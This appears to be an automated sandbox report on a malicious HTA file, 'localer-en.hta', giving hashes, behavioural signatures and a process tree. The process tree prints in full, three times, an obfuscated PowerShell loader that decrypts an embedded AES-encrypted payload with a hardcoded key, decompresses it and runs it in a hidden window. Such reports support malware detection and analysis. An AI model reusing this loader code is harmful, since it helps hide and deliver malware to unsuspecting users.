Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
17-08-2023 07:41
Static task
static1
Behavioral task
behavioral1
Sample
localer-en.hta
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
localer-en.hta
Resource
win10v2004-20230703-en
General
-
Target
localer-en.hta
-
Size
1.1MB
-
MD5
674e3c0ae0f2627c10b58a717ee093bd
-
SHA1
21f15d58046119712572a5114b781027c99f7bc4
-
SHA256
b5f52078915dbe23dcb847e7badd546e1325403e56694ea624aac39c68d6f985
-
SHA512
4d6444d49befa990756aa4e668ac6b664b4bdd1b19bf3914afe067ed0ed0d6ee6e34a114e0a47d1363bcf588b307f032b3c0638620385f02d12583f1706d37ef
-
SSDEEP
1536:7pLwiizmnY5q7O2Db9L1/j/SFBOWrhRxPNahQo8y8Im+lIWFT5YhmFfON/H8P2c0:7ppizmnYs7Og9LNjaH1rhRxPNahYYPs
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4159544280-4273523227-683900707-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2384 powershell.exe 2384 powershell.exe 2384 powershell.exe 2032 powershell.exe 2820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2384 powershell.exe Token: SeDebugPrivilege 2032 powershell.exe Token: SeDebugPrivilege 2820 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2472 wrote to memory of 2384 2472 mshta.exe 28 PID 2472 wrote to memory of 2384 2472 mshta.exe 28 PID 2472 wrote to memory of 2384 2472 mshta.exe 28 PID 2472 wrote to memory of 2384 2472 mshta.exe 28 PID 2384 wrote to memory of 2972 2384 powershell.exe 30 PID 2384 wrote to memory of 2972 2384 powershell.exe 30 PID 2384 wrote to memory of 2972 2384 powershell.exe 30 PID 2384 wrote to memory of 2972 2384 powershell.exe 30 PID 2972 wrote to memory of 2820 2972 cmd.exe 32 PID 2972 wrote to memory of 2820 2972 cmd.exe 32 PID 2972 wrote to memory of 2820 2972 cmd.exe 32 PID 2972 wrote to memory of 2820 2972 cmd.exe 32 PID 2972 wrote to memory of 2032 2972 cmd.exe 33 PID 2972 wrote to memory of 2032 2972 cmd.exe 33 PID 2972 wrote to memory of 2032 2972 cmd.exe 33 PID 2972 wrote to memory of 2032 2972 cmd.exe 33
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\localer-en.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $jvrvREYW = 'AAAAAAAAAAAAAAAAAAAAACgiT7Y6Z5d/gZwdUWnb/wGi4NctLSgkyccbly+bEqQsyRsSSqGsbJkH8xfddXt1oDHIKDlWlkPbqfbGz7Pqyi8DESzA5X9WncEpM+hQdLk6SnFNyN7Jv2VHG5Kfp/y4cw1AfxzLYmEGNCdUsR1JiqlFnCLj02Pq6PcZynb5Srpc8xDiyvtwMifuO7Na/a3hWjJ/MxJ0qCdBl/uag/A2lOte5S6dmgxB97AjvlQD6+XzkIpm+Cyd13C7wRAQ4ezINZzs9oMChO54QkRC7+AZhpVgw/vSUr2Mvo6rBLBD2SUx5mLjXOUlfO+qI8/RuDoqKji4hNYsRRDe5jcSwTHMTNf8Zea5zKrBV0yduMUBgDZRVfPAyLyF0IJeTgCsNNbtcNItTHW6NpzI3L7dyfL23vAMG0YpE2wIidNAvyYzYwKb5HUYHGRciHJCm2zyT0ohu27CR7v63ad1DRUiBdR8CHxLodUpDYz49YAwcpcNOKw+kAJ6C7662AFYdrwJFzRI4hpUd6smMl0xS25yr4eIxgEk5AZ02dptSG5SP5bsrq+N52rMlvKV2VlMTc9j61edotkWFoFj6H5rLeTWngfraYY1+qRFh4KQYqN48hPLqo2q+qbwsxRRVU9JHGRjARME4Gu1WOqX5dv/RhQH0w+67EGyyLZa8osvyqrrOqA5QhXMuZT1zB/XuQu9Xd2jPpYTcCxQ6uUH3snmxKT6yEZVA0S3SguKXBxUZ80uGEe2VuaUzDT+nFDoKUUuubIb4CU66ScnyzfXI5LeB+9/TtowRSaEpy1CVhMl6WZ/fYRXvk1lGnJPrhZfbPSYZZx/k7VyhKYHe2AY2YeMItx3v3PGULaX9ktSeiJ2T6N7ZE85xKZ+SD1xgIPv7grsnTBCKR9I8qjIcjVh3W//6FkCBv9WLc+jmfnvFATuBwxGAvSx5/IQKf0nG+wvVZVRl0Z6WuysQ8BMMd7HJ4PD4tPpM7etQiFPIMdiMXUgc5608zbHvqmuhn/03fZlHLqON4OhTX1a7Z+vVxp0gMIoox1wBxuCzws=';$buWIRXRM = 'Y3J5enZTRlFMY1lVZkFzdFdhUkFpZnpQTkhuRlF5UFE=';$WpUVMfnw = New-Object 'System.Security.Cryptography.AesManaged';$WpUVMfnw.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpUVMfnw.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpUVMfnw.BlockSize = 128;$WpUVMfnw.KeySize = 256;$WpUVMfnw.Key = [System.Convert]::FromBase64String($buWIRXRM);$wQRtj = [System.Convert]::FromBase64String($jvrvREYW);$DzLdUhRi = $wQRtj[0..15];$WpUVMfnw.IV = $DzLdUhRi;$jJnybVCSh = $WpUVMfnw.CreateDecryptor();$HDfASYyGf = $jJnybVCSh.TransformFinalBlock($wQRtj, 16, $wQRtj.Length - 16);$WpUVMfnw.Dispose();$RtuBu = New-Object System.IO.MemoryStream( , $HDfASYyGf );$coZHjS = New-Object System.IO.MemoryStream;$ZbwYXDHvr = New-Object System.IO.Compression.GzipStream $RtuBu, ([IO.Compression.CompressionMode]::Decompress);$ZbwYXDHvr.CopyTo( $coZHjS );$ZbwYXDHvr.Close();$RtuBu.Close();[byte[]] $lBmCn = $coZHjS.ToArray();$EcHwkbNX = [System.Text.Encoding]::UTF8.GetString($lBmCn);$EcHwkbNX | powershell - }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe $jvrvREYW = 'AAAAAAAAAAAAAAAAAAAAACgiT7Y6Z5d/gZwdUWnb/wGi4NctLSgkyccbly+bEqQsyRsSSqGsbJkH8xfddXt1oDHIKDlWlkPbqfbGz7Pqyi8DESzA5X9WncEpM+hQdLk6SnFNyN7Jv2VHG5Kfp/y4cw1AfxzLYmEGNCdUsR1JiqlFnCLj02Pq6PcZynb5Srpc8xDiyvtwMifuO7Na/a3hWjJ/MxJ0qCdBl/uag/A2lOte5S6dmgxB97AjvlQD6+XzkIpm+Cyd13C7wRAQ4ezINZzs9oMChO54QkRC7+AZhpVgw/vSUr2Mvo6rBLBD2SUx5mLjXOUlfO+qI8/RuDoqKji4hNYsRRDe5jcSwTHMTNf8Zea5zKrBV0yduMUBgDZRVfPAyLyF0IJeTgCsNNbtcNItTHW6NpzI3L7dyfL23vAMG0YpE2wIidNAvyYzYwKb5HUYHGRciHJCm2zyT0ohu27CR7v63ad1DRUiBdR8CHxLodUpDYz49YAwcpcNOKw+kAJ6C7662AFYdrwJFzRI4hpUd6smMl0xS25yr4eIxgEk5AZ02dptSG5SP5bsrq+N52rMlvKV2VlMTc9j61edotkWFoFj6H5rLeTWngfraYY1+qRFh4KQYqN48hPLqo2q+qbwsxRRVU9JHGRjARME4Gu1WOqX5dv/RhQH0w+67EGyyLZa8osvyqrrOqA5QhXMuZT1zB/XuQu9Xd2jPpYTcCxQ6uUH3snmxKT6yEZVA0S3SguKXBxUZ80uGEe2VuaUzDT+nFDoKUUuubIb4CU66ScnyzfXI5LeB+9/TtowRSaEpy1CVhMl6WZ/fYRXvk1lGnJPrhZfbPSYZZx/k7VyhKYHe2AY2YeMItx3v3PGULaX9ktSeiJ2T6N7ZE85xKZ+SD1xgIPv7grsnTBCKR9I8qjIcjVh3W//6FkCBv9WLc+jmfnvFATuBwxGAvSx5/IQKf0nG+wvVZVRl0Z6WuysQ8BMMd7HJ4PD4tPpM7etQiFPIMdiMXUgc5608zbHvqmuhn/03fZlHLqON4OhTX1a7Z+vVxp0gMIoox1wBxuCzws=';$buWIRXRM = 'Y3J5enZTRlFMY1lVZkFzdFdhUkFpZnpQTkhuRlF5UFE=';$WpUVMfnw = New-Object 'System.Security.Cryptography.AesManaged';$WpUVMfnw.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpUVMfnw.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpUVMfnw.BlockSize = 128;$WpUVMfnw.KeySize = 256;$WpUVMfnw.Key = [System.Convert]::FromBase64String($buWIRXRM);$wQRtj = [System.Convert]::FromBase64String($jvrvREYW);$DzLdUhRi = $wQRtj[0..15];$WpUVMfnw.IV = $DzLdUhRi;$jJnybVCSh = $WpUVMfnw.CreateDecryptor();$HDfASYyGf = $jJnybVCSh.TransformFinalBlock($wQRtj, 16, $wQRtj.Length - 16);$WpUVMfnw.Dispose();$RtuBu = New-Object System.IO.MemoryStream( , $HDfASYyGf );$coZHjS = New-Object System.IO.MemoryStream;$ZbwYXDHvr = New-Object System.IO.Compression.GzipStream $RtuBu, ([IO.Compression.CompressionMode]::Decompress);$ZbwYXDHvr.CopyTo( $coZHjS );$ZbwYXDHvr.Close();$RtuBu.Close();[byte[]] $lBmCn = $coZHjS.ToArray();$EcHwkbNX = [System.Text.Encoding]::UTF8.GetString($lBmCn);$EcHwkbNX | powershell -3⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe $jvrvREYW = 'AAAAAAAAAAAAAAAAAAAAACgiT7Y6Z5d/gZwdUWnb/wGi4NctLSgkyccbly+bEqQsyRsSSqGsbJkH8xfddXt1oDHIKDlWlkPbqfbGz7Pqyi8DESzA5X9WncEpM+hQdLk6SnFNyN7Jv2VHG5Kfp/y4cw1AfxzLYmEGNCdUsR1JiqlFnCLj02Pq6PcZynb5Srpc8xDiyvtwMifuO7Na/a3hWjJ/MxJ0qCdBl/uag/A2lOte5S6dmgxB97AjvlQD6+XzkIpm+Cyd13C7wRAQ4ezINZzs9oMChO54QkRC7+AZhpVgw/vSUr2Mvo6rBLBD2SUx5mLjXOUlfO+qI8/RuDoqKji4hNYsRRDe5jcSwTHMTNf8Zea5zKrBV0yduMUBgDZRVfPAyLyF0IJeTgCsNNbtcNItTHW6NpzI3L7dyfL23vAMG0YpE2wIidNAvyYzYwKb5HUYHGRciHJCm2zyT0ohu27CR7v63ad1DRUiBdR8CHxLodUpDYz49YAwcpcNOKw+kAJ6C7662AFYdrwJFzRI4hpUd6smMl0xS25yr4eIxgEk5AZ02dptSG5SP5bsrq+N52rMlvKV2VlMTc9j61edotkWFoFj6H5rLeTWngfraYY1+qRFh4KQYqN48hPLqo2q+qbwsxRRVU9JHGRjARME4Gu1WOqX5dv/RhQH0w+67EGyyLZa8osvyqrrOqA5QhXMuZT1zB/XuQu9Xd2jPpYTcCxQ6uUH3snmxKT6yEZVA0S3SguKXBxUZ80uGEe2VuaUzDT+nFDoKUUuubIb4CU66ScnyzfXI5LeB+9/TtowRSaEpy1CVhMl6WZ/fYRXvk1lGnJPrhZfbPSYZZx/k7VyhKYHe2AY2YeMItx3v3PGULaX9ktSeiJ2T6N7ZE85xKZ+SD1xgIPv7grsnTBCKR9I8qjIcjVh3W//6FkCBv9WLc+jmfnvFATuBwxGAvSx5/IQKf0nG+wvVZVRl0Z6WuysQ8BMMd7HJ4PD4tPpM7etQiFPIMdiMXUgc5608zbHvqmuhn/03fZlHLqON4OhTX1a7Z+vVxp0gMIoox1wBxuCzws=';$buWIRXRM = 'Y3J5enZTRlFMY1lVZkFzdFdhUkFpZnpQTkhuRlF5UFE=';$WpUVMfnw = New-Object 'System.Security.Cryptography.AesManaged';$WpUVMfnw.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpUVMfnw.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpUVMfnw.BlockSize = 128;$WpUVMfnw.KeySize = 256;$WpUVMfnw.Key = [System.Convert]::FromBase64String($buWIRXRM);$wQRtj = [System.Convert]::FromBase64String($jvrvREYW);$DzLdUhRi = $wQRtj[0..15];$WpUVMfnw.IV = $DzLdUhRi;$jJnybVCSh = $WpUVMfnw.CreateDecryptor();$HDfASYyGf = $jJnybVCSh.TransformFinalBlock($wQRtj, 16, $wQRtj.Length - 16);$WpUVMfnw.Dispose();$RtuBu = New-Object System.IO.MemoryStream( , $HDfASYyGf );$coZHjS = New-Object System.IO.MemoryStream;$ZbwYXDHvr = New-Object System.IO.Compression.GzipStream $RtuBu, ([IO.Compression.CompressionMode]::Decompress);$ZbwYXDHvr.CopyTo( $coZHjS );$ZbwYXDHvr.Close();$RtuBu.Close();[byte[]] $lBmCn = $coZHjS.ToArray();$EcHwkbNX = [System.Text.Encoding]::UTF8.GetString($lBmCn);$EcHwkbNX4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OMHOXESL6BCCB1ZO49BA.temp
Filesize7KB
MD5f9129143ae15ee35ed7f5a04976c5c25
SHA183aa38894afe1eba71c54e6f8af37f938c927463
SHA25688e47fbb27e3fc4ea047e1369b543ccbf265af6a276d66fe2fcda9f7d13f3461
SHA5126dba9807299dbfd203e227734d895afcb414f153086a6730a8e6ba965c10366c9dcebee4d0a47bf36a9818feaca4e50f0c405fce8b489b7ae922453bb1ba2a00
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5f9129143ae15ee35ed7f5a04976c5c25
SHA183aa38894afe1eba71c54e6f8af37f938c927463
SHA25688e47fbb27e3fc4ea047e1369b543ccbf265af6a276d66fe2fcda9f7d13f3461
SHA5126dba9807299dbfd203e227734d895afcb414f153086a6730a8e6ba965c10366c9dcebee4d0a47bf36a9818feaca4e50f0c405fce8b489b7ae922453bb1ba2a00
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5f9129143ae15ee35ed7f5a04976c5c25
SHA183aa38894afe1eba71c54e6f8af37f938c927463
SHA25688e47fbb27e3fc4ea047e1369b543ccbf265af6a276d66fe2fcda9f7d13f3461
SHA5126dba9807299dbfd203e227734d895afcb414f153086a6730a8e6ba965c10366c9dcebee4d0a47bf36a9818feaca4e50f0c405fce8b489b7ae922453bb1ba2a00